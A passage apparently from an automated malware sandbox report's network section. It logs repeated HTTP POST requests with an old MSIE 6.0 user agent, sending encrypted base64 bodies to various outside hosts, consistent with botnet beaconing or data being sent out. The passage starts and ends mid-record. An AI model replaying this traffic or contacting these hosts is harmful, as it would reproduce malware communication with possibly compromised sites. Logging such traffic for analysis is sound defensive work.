56 53 36 32 30 6e 62 4a 76 65 61 6f 47 65 45 51 66 58 54 37 51 77 55 62 45 56 55 32 48 42 4b 75 7a 59 58 46 47 53 59 41 6a 31 6f 32 76 73 69 39 43 6b 4a 31 34 69 78 58 77 4d 73 52 53 6d 6a 74 6c 68 66 67 64 56 6e 38 62 4e 61 45 61 63 52 6a 45 41 33 31 6a 59 53 51 6a 30 34 47 58 39 73 4f 44 79 37 38 4e 56 45 57 65 56 36 59 30 31 72 63 2f 33 6c 33 79 49 6e 42 6b 67 3d Data Ascii: OAq8qHvzU2NQ+tDwElK4gWQbJFWBEz9s35xdFolZ0/Ew8YNyl8wkWbaZ9j/CiOsmIZlRiHJVf/FEQBGzwC81c3oOjNHhDW0dsld7WPetHEEZ4+Gr5u4ylGU7LsTd7ynqFAtn31ySiKUFN33mc8EwcKWQiA3b5QuAldPEZTd3mLaRknT0lZVoB7JlPcbAAlVbSzxpQ83gJKnPNNIgVLmcrmLSrtQBcX1cTt/wLTZEb7xF3+80n6m8AEP5zUYzTKYf7wLue7QjM4lqCk53M2DONANfZZxow/7kTKTrUIP5I4cwYMfl9zfaZ1ZNaVfxr3kxsCTNBn84yZlHcFhhqxx+InZaftqsw5iCl4Qg8TZDTqnUNSaX8XP71UCppol1/rp71d1kOmFV2EykLelL5yBJCG0tWToQXXjHRNuspeQFKGwPtat5aVGsziKVoWeD6Yviw+FzPCVmMOHYvVS620nbJveaoGeEQfXT7QwUbEVU2HBKuzYXFGSYAj1o2vsi9CkJ14ixXwMsRSmjtlhfgdVn8bNaEacRjEA31jYSQj04GX9sODy78NVEWeV6Y01rc/3l3yInBkg=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 72 6a 74 4c 6d 52 35 7a 55 32 50 63 57 74 41 7a 61 62 39 33 78 51 48 79 56 62 64 65 53 32 77 35 4d 6a 31 4c 73 57 65 46 4a 31 70 36 72 4d 2b 42 45 4a 69 61 75 4f 4a 57 64 4f 69 41 73 77 33 31 6d 52 65 65 52 30 39 67 68 4c 72 48 68 70 46 67 6c 58 5a 34 2b 4a 46 4f 68 71 55 36 50 66 57 51 47 6f 6a 48 33 30 72 4a 6e 6d 30 41 31 33 37 37 31 30 72 2b 6f 31 4c 72 34 4c 52 58 4e 4f 68 7a 66 79 69 34 4f 2f 6f 38 4c 6f 41 73 4b 4c 56 79 69 48 52 77 49 37 76 32 4c 37 30 4e 7a 4b 38 63 6b 4e 44 2f 46 6a 75 75 73 54 59 51 35 4b 55 52 7a 74 73 30 35 72 4f 38 69 42 63 41 7a 35 70 69 6d 57 33 57 79 37 35 55 72 51 36 4e 47 4e 6a 37 57 32 2f 33 39 74 5a 32 51 64 62 6a 41 7a 37 6b 63 77 34 43 6b 33 33 7a 61 51 6e 73 51 62 47 58 45 6e 31 59 5a 34 42 33 63 47 45 45 72 79 52 6a 67 46 6a 56 43 4a 35 62 42 56 53 55 79 48 52 51 48 56 37 34 4f 62 43 36 57 4a 56 61 41 46 6e 6c 72 75 6a 76 70 30 46 4f 6d 59 35 61 77 62 31 77 45 5a 5a 51 39 64 65 54 42 64 33 6e 46 68 4a 48 4a 74 45 32 7a 61 54 57 4e 6f 32 65 53 4d 46 2f 36 31 33 61 4e 34 36 38 64 56 76 58 38 63 4c 57 37 72 47 52 4e 43 66 64 56 70 51 4f 73 39 57 69 4f 4d 36 4e 4d 32 4d 63 72 35 67 6b 4f 67 6c 49 5a 77 46 55 33 54 4e 48 4b 73 73 33 64 64 75 32 33 58 2b 4b 77 58 47 66 35 4c 43 31 4a 76 77 4b 68 2b 6a 53 4c 54 73 6a 59 41 41 49 30 59 78 48 44 45 4e 39 49 75 4d 79 51 43 79 6c 46 70 4c 44 6f 52 35 38 51 57 6c 73 33 6d 6a 37 7a 69 47 76 2b 56 65 72 63 6a 50 46 35 6b 4b 45 74 2b 76 43 63 4f 4f 47 58 6f 71 4c 2f 42 71 69 53 69 45 2f 59 46 6f 43 61 68 65 67 71 57 34 5a 50 74 6f 75 4f 4a 68 72 63 78 4d 55 52 6a 62 35 36 4c 4d 59 4e 33 56 4e 59 4b 63 5a 71 6a 79 48 51 6c 4d 33 52 46 6f 76 7a 41 31 64 45 39 32 63 33 4e 68 78 34 56 31 68 6c 45 47 65 70 58 56 77 78 66 34 76 4a 72 44 42 78 2b 70 49 77 6a 62 65 66 6e 42 31 55 63 34 58 Data Ascii: rjtLmR5zU2PcWtAzab93xQHyVbdeS2w5Mj1LsWeFJ1p6rM+BEJiauOJWdOiAsw31mReeR09ghLrHhpFglXZ4+JFOhqU6PfWQGojH30rJnm0A137710r+o1Lr4LRXNOhzfyi4O/o8LoAsKLVyiHRwI7v2L70NzK8ckND/FjuusTYQ5KURzts05rO8iBcAz5pimW3Wy75UrQ6NGNj7W2/39tZ2QdbjAz7kcw4Ck33zaQnsQbGXEn1YZ4B3cGEEryRjgFjVCJ5bBVSUyHRQHV74ObC6WJVaAFnlrujvp0FOmY5awb1wEZZQ9deTBd3nFhJHJtE2zaTWNo2eSMF/613aN468dVvX8cLW7rGRNCfdVpQOs9WiOM6NM2Mcr5gkOglIZwFU3TNHKss3ddu23X+KwXGf5LC1JvwKh+jSLTsjYAAI0YxHDEN9IuMyQCylFpLDoR58QWls3mj7ziGv+VercjPF5kKEt+vCcOOGXoqL/BqiSiE/YFoCahegqW4ZPtouOJhrcxMURjb56LMYN3VNYKcZqjyHQlM3RFovzA1dE92c3Nhx4V1hlEGepXVwxf4vJrDBx+pIwjbefnB1Uc4X
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 4d 68 78 70 70 69 7a 67 55 32 4d 37 6a 2b 4a 38 46 39 31 4f 6c 7a 2f 30 33 76 75 45 51 4f 7a 6f 49 4b 53 50 48 5a 57 75 6d 59 52 31 74 4c 53 4e 70 47 65 6c 41 52 6b 38 54 54 4f 46 76 43 35 72 4b 36 6a 47 79 35 41 70 6e 45 69 48 51 70 70 73 47 2b 63 78 45 58 4f 33 50 41 57 2f 32 51 4e 48 75 46 35 6f 43 70 56 6d 32 78 64 73 35 6f 57 51 75 51 50 68 74 53 48 4d 65 74 48 4d 42 78 78 45 74 30 62 35 33 64 74 77 5a 5a 71 35 5a 6f 36 32 5a 61 37 72 79 64 61 30 56 6e 39 70 33 4a 35 55 4f 6c 37 35 6c 59 38 57 62 44 45 78 55 43 6e 70 6e 48 34 45 4e 71 6a 78 6f 36 4f 78 65 63 48 4d 6c 46 39 78 7a 4b 53 31 51 30 54 72 70 61 38 6b 45 2b 6d 67 71 2b 37 43 65 31 54 58 62 75 6c 36 32 30 68 68 71 78 31 54 75 33 6e 59 62 59 2f 48 4d 6b 76 6a 30 6c 79 2f 44 75 70 6a 4e 35 41 49 5a 55 57 45 31 59 66 50 30 50 65 54 47 44 39 38 43 30 46 78 4f 2f 69 78 65 30 54 4c 4c 31 6a 77 33 59 77 4f 78 4c 42 6d 4d 48 6e 41 48 6e 36 39 70 31 6a 6b 32 41 53 62 59 59 2f 4f 36 74 4d 53 70 50 41 66 6b 73 34 78 38 37 4a 56 54 68 76 47 41 7a 65 61 4b 71 70 67 52 66 61 4f 43 71 59 72 5a 31 7a 6e 43 56 42 35 42 59 6e 30 61 4a 6b 46 33 49 52 31 7a 4c 37 68 41 72 59 41 46 33 62 70 6b 58 72 76 73 78 33 2f 34 34 36 69 78 44 6f 66 39 4f 49 4f 6c 61 62 35 44 76 64 43 62 32 6a 75 4f 56 77 4a 6c 62 2f 39 6f 71 43 6e 4e 47 6f 63 33 75 51 44 2b 65 70 64 61 42 31 43 5a 7a 6b 65 45 51 4e 70 39 6d 75 36 74 67 31 74 74 38 4e 30 34 63 65 71 59 33 76 39 67 31 6e 6c 4b 35 39 53 4b 67 48 36 63 79 6c 32 65 73 76 31 38 78 50 41 6d 78 39 78 45 4f 49 45 70 4c 70 71 72 7a 2f 31 4b 34 36 37 72 44 73 2f 49 52 6f 63 7a 70 68 72 67 56 67 70 67 72 46 71 41 2f 58 4c 54 68 57 44 52 55 73 52 4d 68 66 31 6d 30 39 69 46 49 75 79 71 69 5a 6a 4c 69 36 30 30 44 55 47 69 51 3d 3d Data Ascii: MhxppizgU2M7j+J8F91Olz/03vuEQOzoIKSPHZWumYR1tLSNpGelARk8TTOFvC5rK6jGy5ApnEiHQppsG+cxEXO3PAW/2QNHuF5oCpVm2xds5oWQuQPhtSHMetHMBxxEt0b53dtwZZq5Zo62Za7ryda0Vn9p3J5UOl75lY8WbDExUCnpnH4ENqjxo6OxecHMlF9xzKS1Q0Trpa8kE+mgq+7Ce1TXbul620hhqx1Tu3nYbY/HMkvj0ly/DupjN5AIZUWE1YfP0PeTGD98C0FxO/ixe0TLL1jw3YwOxLBmMHnAHn69p1jk2ASbYY/O6tMSpPAfks4x87JVThvGAzeaKqpgRfaOCqYrZ1znCVB5BYn0aJkF3IR1zL7hArYAF3bpkXrvsx3/446ixDof9OIOlab5DvdCb2juOVwJlb/9oqCnNGoc3uQD+epdaB1CZzkeEQNp9mu6tg1tt8N04ceqY3v9g1nlK59SKgH6cyl2esv18xPAmx9xEOIEpLpqrz/1K467rDs/IRoczphrgVgpgrFqA/XLThWDRUsRMhf1m09iFIuyqiZjLi600DUGiQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 54 45 79 49 6b 7a 5a 44 55 32 4e 7a 43 68 4a 64 6b 65 47 32 42 4e 6e 74 50 6c 4e 57 57 55 6e 32 79 72 70 4f 75 54 38 6f 41 75 6f 78 53 50 76 78 31 47 4b 46 66 47 48 5a 69 6d 45 4e 6b 61 42 52 72 34 47 4a 53 32 61 4a 4f 39 50 63 66 32 46 6e 39 35 6d 33 68 42 6c 77 62 45 53 46 69 6d 6b 67 50 4e 5a 73 71 37 49 65 74 32 66 6d 30 56 57 52 72 77 45 39 50 68 71 4a 53 76 6a 30 62 46 39 35 49 35 38 4c 47 63 4b 48 59 71 70 54 64 69 64 6d 38 67 78 61 59 5a 7a 73 39 34 63 36 6c 31 4c 79 4c 48 37 58 61 38 5a 4d 65 56 75 4f 34 42 37 6d 42 69 6f 42 6b 69 5a 4e 67 54 59 61 31 4c 57 50 31 66 76 45 69 4e 44 55 45 41 69 6b 4e 67 4c 31 58 79 6a 62 45 51 42 62 45 32 4c 59 63 77 36 4a 32 6e 48 63 30 64 43 73 6d 47 6c 75 37 44 58 33 43 46 47 61 2b 75 71 38 61 64 74 4d 56 51 50 33 2f 48 74 2b 35 4f 6f 4b 73 34 62 76 53 61 46 70 75 4a 6d 46 4a 61 38 46 2f 5a 45 74 4f 59 42 31 76 63 32 61 6f 63 32 49 32 48 5a 53 30 36 2b 49 31 34 6c 34 73 2f 6b 47 4b 63 59 31 31 42 6e 6b 38 4b 46 2b 70 71 31 4b 77 72 78 7a 39 32 74 54 52 4e 43 69 2b 48 78 68 4a 31 58 76 4c 70 31 43 63 71 53 45 59 34 59 4d 43 78 6d 48 55 67 4c 33 2b 6b 57 71 76 77 2b 2f 32 49 73 74 58 36 57 59 56 62 78 54 78 55 6d 65 6b 77 48 64 43 30 53 54 45 72 35 2b 38 45 75 34 70 48 36 67 4f 73 72 33 49 4a 53 53 6c 42 48 6c 79 64 33 78 78 62 69 52 75 52 65 42 50 31 75 4f 4c 65 77 6e 31 78 77 37 43 59 47 49 34 6c 49 77 61 51 59 45 74 35 54 62 39 55 74 62 53 41 44 7a 78 57 48 43 58 6f 4a 63 39 43 6e 6a 49 57 4c 72 37 78 66 54 56 62 6d 58 58 47 79 77 75 44 64 48 6f 6b 46 52 45 4f 6d 57 42 42 6e 58 72 2f 55 6e 44 79 69 4d 35 36 46 42 67 66 7a 63 7a 5a 62 68 61 6d 52 67 37 4b 46 6f 42 77 46 78 64 69 63 2b 30 54 59 2f 49 55 65 2b 36 33 78 76 76 4f 61 41 77 33 55 30 Data Ascii: TEyIkzZDU2NzChJdkeG2BNntPlNWWUn2yrpOuT8oAuoxSPvx1GKFfGHZimENkaBRr4GJS2aJO9Pcf2Fn95m3hBlwbESFimkgPNZsq7Iet2fm0VWRrwE9PhqJSvj0bF95I58LGcKHYqpTdidm8gxaYZzs94c6l1LyLH7Xa8ZMeVuO4B7mBioBkiZNgTYa1LWP1fvEiNDUEAikNgL1XyjbEQBbE2LYcw6J2nHc0dCsmGlu7DX3CFGa+uq8adtMVQP3/Ht+5OoKs4bvSaFpuJmFJa8F/ZEtOYB1vc2aoc2I2HZS06+I14l4s/kGKcY11Bnk8KF+pq1Kwrxz92tTRNCi+HxhJ1XvLp1CcqSEY4YMCxmHUgL3+kWqvw+/2IstX6WYVbxTxUmekwHdC0STEr5+8Eu4pH6gOsr3IJSSlBHlyd3xxbiRuReBP1uOLewn1xw7CYGI4lIwaQYEt5Tb9UtbSADzxWHCXoJc9CnjIWLr7xfTVbmXXGywuDdHokFREOmWBBnXr/UnDyiM56FBgfzczZbhamRg7KFoBwFxdic+0TY/IUe+63xvvOaAw3U0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 43 49 55 45 67 32 5a 61 59 32 4f 48 61 53 4d 38 41 53 35 31 73 6f 6c 38 73 34 68 47 2b 44 34 4e 2b 6a 51 48 37 51 6b 6b 44 70 54 6d 6e 39 68 4a 32 38 79 41 6b 77 39 33 49 6c 38 5a 36 35 71 63 69 43 53 66 32 4f 72 7a 61 6f 56 77 69 4c 76 34 75 6b 57 4c 6e 4c 71 6f 64 44 4d 64 58 43 77 76 41 6c 56 63 6d 78 35 64 35 34 48 72 33 36 6f 76 54 70 4b 74 38 6d 6d 62 6f 43 70 4e 48 55 6b 58 69 56 54 45 68 74 34 47 31 32 2f 76 2f 78 38 38 30 43 53 62 64 39 49 6d 47 47 61 45 4f 30 42 38 6e 56 47 57 4d 49 62 61 77 44 64 4c 32 34 79 6c 56 33 6a 51 56 6b 4b 39 77 69 45 76 64 71 7a 67 77 4b 51 4e 2b 67 34 6f 4f 4c 4e 63 76 4f 5a 78 4e 46 4d 4a 77 39 50 6e 30 31 4a 35 41 41 67 4b 6a 6f 6b 74 56 47 6f 57 79 73 4d 77 38 6f 4c 45 4a 4d 4c 57 79 55 6e 6e 53 2b 62 4f 2b 61 4c 44 58 43 58 31 31 38 6b 6a 45 2b 64 49 71 30 61 66 4c 6f 44 4e 48 6f 7a 35 55 39 43 4e 51 37 7a 7a 76 58 77 6c 41 45 75 53 39 56 4d 2b 35 49 2b 61 59 32 57 4e 43 65 31 76 78 56 6c 44 33 42 58 4f 4c 2f 5a 4f 71 2f 2b 55 68 71 51 58 67 76 53 69 6d 67 6a 38 2b 2b 42 74 69 69 76 30 44 68 55 35 41 62 43 6c 49 78 65 2f 58 65 58 2b 71 36 4b 71 51 53 71 75 38 71 59 2f 79 2f 4a 36 55 59 51 36 6a 63 77 45 6b 37 32 36 47 56 4e 46 72 2f 35 7a 63 52 4a 79 43 34 70 57 62 4e 68 51 4e 62 30 63 34 4c 74 50 74 36 34 4c 6c 30 6d 77 49 56 46 7a 66 71 79 70 72 6c 47 79 59 6c 72 4b 56 73 54 34 34 44 71 6b 4f 4a 38 4b 31 34 66 6a 79 50 76 74 49 4e 32 64 45 63 39 48 6e 67 66 38 53 46 44 4e 72 35 39 49 41 64 43 68 63 47 35 6f 32 57 56 54 44 35 45 52 6a 47 63 42 76 70 6f 33 36 44 37 72 55 33 6b 32 6a 64 58 30 45 70 61 69 41 69 71 69 42 73 4a 43 78 63 4f 78 38 6c 69 6d 2b 6b 59 37 Data Ascii: CIUEg2ZaY2OHaSM8AS51sol8s4hG+D4N+jQH7QkkDpTmn9hJ28yAkw93Il8Z65qciCSf2OrzaoVwiLv4ukWLnLqodDMdXCwvAlVcmx5d54Hr36ovTpKt8mmboCpNHUkXiVTEht4G12/v/x880CSbd9ImGGaEO0B8nVGWMIbawDdL24ylV3jQVkK9wiEvdqzgwKQN+g4oOLNcvOZxNFMJw9Pn01J5AAgKjoktVGoWysMw8oLEJMLWyUnnS+bO+aLDXCX118kjE+dIq0afLoDNHoz5U9CNQ7zzvXwlAEuS9VM+5I+aY2WNCe1vxVlD3BXOL/ZOq/+UhqQXgvSimgj8++Btiiv0DhU5AbClIxe/XeX+q6KqQSqu8qY/y/J6UYQ6jcwEk726GVNFr/5zcRJyC4pWbNhQNb0c4LtPt64Ll0mwIVFzfqyprlGyYlrKVsT44DqkOJ8K14fjyPvtIN2dEc9Hngf8SFDNr59IAdChcG5o2WVTD5ERjGcBvpo36D7rU3k2jdX0EpaiAiqiBsJCxcOx8lim+kY7
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 6f 55 42 69 44 30 2f 70 5a 32 50 36 32 71 44 51 37 6b 5a 69 65 46 69 51 43 57 48 6c 76 2b 74 45 38 32 57 78 79 52 6c 56 4a 78 78 43 49 61 4c 52 4a 30 61 41 36 6a 5a 34 66 32 47 78 57 4e 32 4a 56 47 51 6e 78 70 47 58 6b 34 5a 74 71 36 67 79 68 78 36 4d 73 46 69 6b 46 44 53 4f 31 50 2b 55 32 6b 36 74 69 6c 69 64 69 52 32 39 68 47 4d 69 4c 73 4f 77 4b 32 39 41 6a 31 49 6f 6e 69 6f 41 38 56 42 55 75 74 44 69 48 31 5a 62 4c 63 36 52 73 76 38 67 57 37 48 44 71 63 69 38 36 77 43 70 43 58 36 51 6b 4f 37 6e 74 76 50 38 6e 72 56 54 4b 30 41 49 34 39 6c 47 61 39 31 74 6e 65 78 34 37 51 79 5a 63 30 56 55 4d 6f 79 56 54 63 31 41 4b 6e 31 35 70 50 65 76 6b 69 4d 6a 63 42 36 50 4b 57 47 5a 45 6f 7a 31 69 46 68 52 79 59 41 32 31 36 31 38 77 72 54 42 59 68 72 67 41 63 76 48 45 5a 49 51 41 43 67 6c 43 43 44 6c 46 47 38 2b 49 69 6e 31 58 49 66 76 38 4b 4e 79 73 73 77 7a 2f 36 58 4f 73 78 39 2f 63 67 32 38 55 4c 33 76 51 36 73 37 31 79 4e 57 46 4b 31 2b 2b 44 59 77 54 6d 41 53 54 62 75 41 72 4a 38 78 47 2f 34 79 77 4c 48 75 31 65 78 51 52 77 61 66 6e 31 63 52 64 78 79 53 65 62 62 37 42 61 79 74 42 72 65 6b 71 32 46 31 64 37 61 68 2b 59 6b 6d 37 37 47 75 35 64 6a 50 54 77 58 33 4f 53 48 51 63 4b 62 61 71 69 67 62 57 43 41 6e 4c 45 45 58 7a 33 77 36 71 4f 5a 4a 72 7a 4d 4f 35 73 32 5a 66 69 73 33 78 66 64 32 65 4c 71 38 6e 71 52 63 44 42 54 73 66 48 44 33 4d 79 59 6d 4f 42 73 45 78 57 43 46 6b 42 47 6a 43 6c 39 51 78 70 38 6b 70 30 34 36 4b 54 2f 67 34 2f 58 47 63 72 45 61 53 37 39 6f 35 41 38 6c 4d 76 4d 55 41 36 33 6d 73 6c 45 6b 77 31 6d 2f 46 62 54 30 70 58 76 56 59 33 77 59 47 53 32 33 6e 75 66 53 4a 37 68 6e 63 44 37 43 4f 33 64 50 38 51 3d 3d Data Ascii: oUBiD0/pZ2P62qDQ7kZieFiQCWHlv+tE82WxyRlVJxxCIaLRJ0aA6jZ4f2GxWN2JVGQnxpGXk4Ztq6gyhx6MsFikFDSO1P+U2k6tilidiR29hGMiLsOwK29Aj1IonioA8VBUutDiH1ZbLc6Rsv8gW7HDqci86wCpCX6QkO7ntvP8nrVTK0AI49lGa91tnex47QyZc0VUMoyVTc1AKn15pPevkiMjcB6PKWGZEoz1iFhRyYA21618wrTBYhrgAcvHEZIQACglCCDlFG8+Iin1XIfv8KNysswz/6XOsx9/cg28UL3vQ6s71yNWFK1++DYwTmASTbuArJ8xG/4ywLHu1exQRwafn1cRdxySebb7BaytBrekq2F1d7ah+Ykm77Gu5djPTwX3OSHQcKbaqigbWCAnLEEXz3w6qOZJrzMO5s2Zfis3xfd2eLq8nqRcDBTsfHD3MyYmOBsExWCFkBGjCl9Qxp8kp046KT/g4/XGcrEaS79o5A8lMvMUA63mslEkw1m/FbT0pXvVY3wYGS23nufSJ7hncD7CO3dP8Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 4b 6f 65 6f 6a 42 49 4b 55 32 50 76 44 6a 34 45 78 61 4a 72 57 52 56 46 73 49 4a 69 37 36 67 4d 5a 75 47 61 50 35 39 4e 39 6f 4b 50 4a 4d 59 67 32 79 67 6f 56 4d 54 75 55 67 6a 79 35 49 50 50 78 7a 6a 75 52 63 37 49 78 51 37 52 53 78 71 76 61 45 62 65 57 50 50 48 78 4e 46 34 54 52 46 31 41 4b 78 37 75 45 38 31 6f 49 50 32 50 6e 31 6e 79 37 34 6a 38 4d 69 48 70 4b 4e 6f 72 4c 6d 72 79 58 7a 63 6d 66 79 46 2f 41 39 33 78 79 45 6d 72 35 58 5a 32 46 41 64 34 79 76 53 55 34 55 65 4a 76 36 6e 49 57 4f 7a 33 64 74 70 4b 79 42 44 53 74 74 42 51 38 39 4d 50 71 64 30 59 47 66 74 39 67 61 44 75 59 31 74 37 53 4d 75 54 6f 45 71 70 58 69 43 6e 5a 41 36 57 71 56 33 79 66 61 78 58 71 77 71 36 50 58 75 35 4f 41 48 70 6a 4f 4a 75 67 47 7a 6c 50 76 39 71 6d 6c 34 6f 73 75 2b 46 70 58 71 66 45 4c 69 66 37 79 44 6b 31 34 37 72 36 5a 52 2b 57 4c 74 44 31 43 43 4a 64 55 42 51 36 36 37 44 39 6e 30 79 46 4d 76 63 54 72 63 76 32 39 52 44 78 2b 4f 4a 70 4f 2b 74 32 38 74 2b 66 37 65 7a 38 68 42 66 59 37 74 74 73 73 76 75 46 6d 51 41 4c 31 4a 74 41 76 6a 6a 2b 59 6f 62 78 6e 43 57 70 2b 79 2b 4b 64 44 65 2b 6b 73 4a 54 6f 7a 58 45 46 6f 47 38 72 34 6d 48 45 68 79 76 68 57 7a 30 32 2f 6f 71 68 70 79 50 42 73 36 6c 39 33 64 63 65 47 4b 66 38 73 31 75 48 54 35 72 50 79 47 45 59 43 37 66 54 2f 31 6b 4e 76 59 32 42 58 64 76 79 42 79 45 48 2f 4d 6d 65 39 32 7a 75 47 77 70 2f 49 4f 75 4f 78 66 72 35 6c 4b 58 2b 48 6c 30 51 41 71 65 53 62 65 6b 51 5a 50 30 79 7a 5a 78 52 65 57 4c 66 34 34 44 34 51 49 34 41 62 66 56 56 68 45 6c 69 51 39 64 36 41 54 30 58 33 76 34 76 49 36 43 74 4a 39 64 6b 45 2f 50 52 56 43 48 38 57 6c 64 79 78 36 73 46 67 35 5a 6c 72 Data Ascii: KoeojBIKU2PvDj4ExaJrWRVFsIJi76gMZuGaP59N9oKPJMYg2ygoVMTuUgjy5IPPxzjuRc7IxQ7RSxqvaEbeWPPHxNF4TRF1AKx7uE81oIP2Pn1ny74j8MiHpKNorLmryXzcmfyF/A93xyEmr5XZ2FAd4yvSU4UeJv6nIWOz3dtpKyBDSttBQ89MPqd0YGft9gaDuY1t7SMuToEqpXiCnZA6WqV3yfaxXqwq6PXu5OAHpjOJugGzlPv9qml4osu+FpXqfELif7yDk147r6ZR+WLtD1CCJdUBQ667D9n0yFMvcTrcv29RDx+OJpO+t28t+f7ez8hBfY7ttssvuFmQAL1JtAvjj+YobxnCWp+y+KdDe+ksJTozXEFoG8r4mHEhyvhWz02/oqhpyPBs6l93dceGKf8s1uHT5rPyGEYC7fT/1kNvY2BXdvyByEH/Mme92zuGwp/IOuOxfr5lKX+Hl0QAqeSbekQZP0yzZxReWLf44D4QI4AbfVVhEliQ9d6AT0X3v4vI6CtJ9dkE/PRVCH8Wldyx6sFg5Zlr
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 4f 41 71 38 71 48 76 7a 55 32 4e 51 2b 74 44 77 45 6c 4b 34 67 57 51 62 4a 46 57 42 45 7a 39 73 33 35 78 64 46 6f 6c 5a 30 2f 45 77 38 59 4e 79 6c 38 77 6b 57 62 61 5a 39 6a 2f 43 69 4f 73 6d 49 5a 6c 52 69 48 4a 56 66 2f 46 45 51 42 47 7a 77 43 38 31 63 33 6f 4f 6a 4e 48 68 44 57 30 64 73 6c 64 37 57 50 65 74 48 45 45 5a 34 2b 47 72 35 75 34 79 6c 47 55 37 4c 73 54 64 37 79 6e 71 46 41 74 6e 33 31 79 53 69 4b 55 46 4e 33 33 6d 63 38 45 77 63 4b 57 51 69 41 33 62 35 51 75 41 6c 64 50 45 5a 54 64 33 6d 4c 61 52 6b 6e 54 30 6c 5a 56 6f 42 37 4a 6c 50 63 62 41 41 6c 56 62 53 7a 78 70 51 38 33 67 4a 4b 6e 50 4e 4e 49 67 56 4c 6d 63 72 6d 4c 53 72 74 51 42 63 58 31 63 54 74 2f 77 4c 54 5a 45 62 37 78 46 33 2b 38 30 6e 36 6d 38 41 45 50 35 7a 55 59 7a 54 4b 59 66 37 77 4c 75 65 37 51 6a 4d 34 6c 71 43 6b 35 33 4d 32 44 4f 4e 41 4e 66 5a 5a 78 6f 77 2f 37 6b 54 4b 54 72 55 49 50 35 49 34 63 77 59 4d 66 6c 39 7a 66 61 5a 31 5a 4e 61 56 66 78 72 33 6b 78 73 43 54 4e 42 6e 38 34 79 5a 6c 48 63 46 68 68 71 78 78 2b 49 6e 5a 61 66 74 71 73 77 35 69 43 6c 34 51 67 38 54 5a 44 54 71 6e 55 4e 53 61 58 38 58 50 37 31 55 43 70 70 6f 6c 31 2f 72 70 37 31 64 31 6b 4f 6d 46 56 32 45 79 6b 4c 65 6c 4c 35 79 42 4a 43 47 30 74 57 54 6f 51 58 58 6a 48 52 4e 75 73 70 65 51 46 4b 47 77 50 74 61 74 35 61 56 47 73 7a 69 4b 56 6f 57 65 44 36 59 76 69 77 2b 46 7a 50 43 56 6d 4d 4f 48 59 76 56 53 36 32 30 6e 62 4a 76 65 61 6f 47 65 45 51 66 58 54 37 51 77 55 62 45 56 55 32 48 42 4b 75 7a 59 58 46 47 53 59 41 6a 31 6f 32 76 73 69 39 43 6b 4a 31 34 69 78 58 77 4d 73 52 53 6d 6a 74 6c 68 66 67 64 56 6e 38 62 4e 61 45 61 63 52 6a 45 41 33 31 6a 59 53 51 6a 30 34 47 58 39 73 4f 44 79 37 38 4e 56 45 57 65 56 36 59 30 31 72 63 2f 33 6c 33 79 49 6e 42 6b 67 3d Data Ascii: OAq8qHvzU2NQ+tDwElK4gWQbJFWBEz9s35xdFolZ0/Ew8YNyl8wkWbaZ9j/CiOsmIZlRiHJVf/FEQBGzwC81c3oOjNHhDW0dsld7WPetHEEZ4+Gr5u4ylGU7LsTd7ynqFAtn31ySiKUFN33mc8EwcKWQiA3b5QuAldPEZTd3mLaRknT0lZVoB7JlPcbAAlVbSzxpQ83gJKnPNNIgVLmcrmLSrtQBcX1cTt/wLTZEb7xF3+80n6m8AEP5zUYzTKYf7wLue7QjM4lqCk53M2DONANfZZxow/7kTKTrUIP5I4cwYMfl9zfaZ1ZNaVfxr3kxsCTNBn84yZlHcFhhqxx+InZaftqsw5iCl4Qg8TZDTqnUNSaX8XP71UCppol1/rp71d1kOmFV2EykLelL5yBJCG0tWToQXXjHRNuspeQFKGwPtat5aVGsziKVoWeD6Yviw+FzPCVmMOHYvVS620nbJveaoGeEQfXT7QwUbEVU2HBKuzYXFGSYAj1o2vsi9CkJ14ixXwMsRSmjtlhfgdVn8bNaEacRjEA31jYSQj04GX9sODy78NVEWeV6Y01rc/3l3yInBkg=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 6c 43 51 73 4e 73 59 72 61 57 4f 61 64 4a 64 79 34 52 43 4e 64 75 6b 30 79 52 41 6d 52 53 2b 66 57 6d 79 67 68 75 73 66 54 6e 79 4f 79 2f 32 4b 34 6f 56 2b 76 46 58 44 36 75 54 76 4b 61 64 33 46 2b 36 32 48 66 2f 38 35 64 39 4c 32 5a 71 53 72 42 67 6a 32 69 6a 78 6e 62 66 34 59 63 59 4a 6a 6e 7a 42 75 61 42 62 6f 62 64 34 48 35 43 31 48 67 77 73 44 61 69 30 38 65 64 6f 69 6c 30 68 6f 55 59 6e 73 62 4a 70 4b 78 41 70 